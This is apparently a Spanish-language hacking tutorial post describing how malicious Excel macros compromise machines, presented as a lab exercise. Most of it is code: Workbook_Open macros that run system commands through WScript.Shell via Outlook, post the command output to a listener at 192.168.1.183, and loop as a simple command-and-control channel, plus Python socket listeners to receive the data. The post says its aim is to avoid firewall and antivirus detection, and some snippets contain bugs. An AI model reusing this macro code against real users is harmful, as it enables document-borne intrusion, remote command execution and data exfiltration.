Hackers VULNERAN SEGURIDAD con MACROS de EXCEL | Seguridad Informática
Publicado: 26 Abr 2021, 23:24
Muchos ataques comienzan con un simple documento que ejecuta código malicioso. Los atacantes astutos pueden incluso personalizar la carga útil para eludir los controles de los terminales. Aquie te mostramos un codigo en Visual Basic y en python (este ultimo en kali linux) que permite que los ataques no sean detectados por los firewall ni antivirus.
LABORATORIO de Prueba o Escenario de Trabajo
CODIGOS VISUAL BASIC Para Macros de Paquetes de Microsoft Office
Basicos
CODIGO de Programación USADO EN EL VIDEOCODIGO ENCRIPTADO
CODIGOS en PYTHON | Socket Servidores Listeners
VIDEO TUTORIAL
Links de Interes
https://realpython.com/python-sockets/#tcp-sockets
https://rico-schmidt.name/pymotw-3/socket/tcp.html
ehtical hacking,ethical hacker,cyber seguridad,security,install,instalar,linux,unix,brute forcing tool,penetration tests,herramienta,debian,ubuntu,synology,python,xpenology,linux for ethical hackers,cursos,courses,capacitacion,educacion,How Hackers Do It,proteger computadoras,Information Systems Security Professional,CompTIA Security+,servers,servidores,educación,auditoria,escaneo,Detección de intrusiones en la red,vulnerabilidades,sheet,phyton,PowerShell,visual basic,Programación, Codigo, Lenguaje, programing, Programar
LABORATORIO de Prueba o Escenario de Trabajo
CODIGOS VISUAL BASIC Para Macros de Paquetes de Microsoft Office
Basicos
Código: Seleccionar todo
Sub macro()
MsgBox ("Hola manga de Culiados")
End SubCódigo: Seleccionar todo
Sub WorkBook_Open()
MsgBox ("Hola manga de Culiados")
End SubCódigo: Seleccionar todo
Sub WorkBook_Open()
Set WshShell = CreateObject ("WScript.Shell")
Set WshShellExec = WshShell.Exec ("Whoami")
MsgBox (WshShellExec.StdOut.ReadAll)
End SubCódigo: Seleccionar todo
Sub WorkBook_Open()
Set objOL = CreateObject ("Outlook.Application")
Set WshShell = objOL.CreateObject ("WScript.Shell")
Set WshShellExec = WshShell.Exec ("Whoami")
Set WshShellExec = WshShell.Exec ("powershell -c sleep 5000")
MsgBox (WshShellExec.StdOut.ReadAll)
End SubCódigo: Seleccionar todo
Function RunCommand(command As String) As String
On Error GoTo error
Set objOL = CreateObject("Outlook.Application")
Set WshShell = objOL.CreateObject("Wscript.Shell")
Set WshShellExec = WshShell.Exec(command)
RunCommand = WshShellExec.StdOut.ReadAll
Done:
Exit Function
error:
RunCommand = "Error"
End Function
Function SendToServer(data As String)
On Error GoTo error
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
Url = "http://192.168.1.183:5000"
objHTTP.Open "POST", Url, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send (data)
Done:
Exit Function
error:
MsgBox ("Cannot connect to Server")
End Function
Sub WorkBook_Open()
Dim strData As String
Dim strCommand As String
strOutput = RunCommand("ipconfig")
MsgBox (strOutput)
SendToServer (strOutput)
End SubCódigo: Seleccionar todo
Function RunCommand(command As String) As String
On Error GoTo error
Set objOL = CreateObject("Outlook.Application")
Set WshShell = objOL.CreateObject("Wscript.Shell")
Set WshShellExec = WshShell.Exec(command)
RunCommand = WshShellExec.StdOut.ReadAll
Done:
Exit Function
error:
RunCommand = "Error"
End Function
Function StartC2()
Dim replyTXT as String
On Error GoTo error
data = "START"
Do While replyTXT <>
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
Url = "http://192.168.1.183:5000"
objHTTP.Open "POST", Url, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send (data)
replyTXT =objHTTP.reponseText
data = RunCommand (replyTXT)
Loop
Done:
Exit Function
error:
MsgBox ("Cannot connect to Server")
End Function
Sub WorkBook_Open()
Dim strData As String
Dim strCommand As String
strOutput = RunCommand("ipconfig")
MsgBox (strOutput)
SendToServerEnc (strOutput)
StartC2
End SubCódigo: Seleccionar todo
import socket
import sys
mi_socket = socket.socket()
mi_socket.bind( ( '192.168.1.183',8000) )
mi_socket.listen(100)
conexion, addr = mi_socket.accept()
print "nueva conexion Establecida"
print addr
peticion = conexion.recv(4096)
print peticion
conexion.send ("hola te saludo desde el servidor")
conexion.close()Código: Seleccionar todo
import socket
import sys
mi_socket = socket.socket()
mi_socket.bind( ( '192.168.1.183',8000) )
mi_socket.listen(100)
server_address = ('192.168.1.183', 8000)
print('starting up on {} port {}'.format(*server_address))
print('waiting for a connection')
while True:
conexion, addr = mi_socket.accept()
print "nueva conexion Establecida"
print addr
peticion = conexion.recv(16384)
print peticion
if not peticion:
break
conexion.close()Código: Seleccionar todo
import socket
import sys
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ('192.168.1.183', 8000)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
# Listen for incoming connections
sock.listen(100)
while True:
# Wait for a connection
print('waiting for a connection')
connection, client_address = sock.accept()
try:
print('connection from', client_address)
# Receive the data in small chunks and retransmit it
while True:
data = connection.recv(4096)
print( format(data) )
if data:
print(data)
#connection.sendall(data)
else:
print('no data from', client_address)
break
finally:
# Clean up the connection
connection.close()Código: Seleccionar todo
import socket
import sys
__author__ = 'uva'
'''
Synchronous tcp server
'''
# For tcp
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# To fix the address already in use issue
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind to all the interfaces on port 8080
sock.bind(("192.168.1.183", 8080))
# Number of backlog clients
sock.listen(100)
print "Waiting for client....!"
while True:
(client, (ip, port)) = sock.accept()
print 'client connected with ip as {} and port {}'.format(ip, port)
data = client.recv(2048)
while len(data):
print len(data)
print "Client sent the data : {}".format(data)
client.send(data.upper())
data = client.recv(2048)
print "Client closed connection !!! :( "
client.close()
print "Closing the Socket!!"
sock.close()Links de Interes
https://realpython.com/python-sockets/#tcp-sockets
https://rico-schmidt.name/pymotw-3/socket/tcp.html
ehtical hacking,ethical hacker,cyber seguridad,security,install,instalar,linux,unix,brute forcing tool,penetration tests,herramienta,debian,ubuntu,synology,python,xpenology,linux for ethical hackers,cursos,courses,capacitacion,educacion,How Hackers Do It,proteger computadoras,Information Systems Security Professional,CompTIA Security+,servers,servidores,educación,auditoria,escaneo,Detección de intrusiones en la red,vulnerabilidades,sheet,phyton,PowerShell,visual basic,Programación, Codigo, Lenguaje, programing, Programar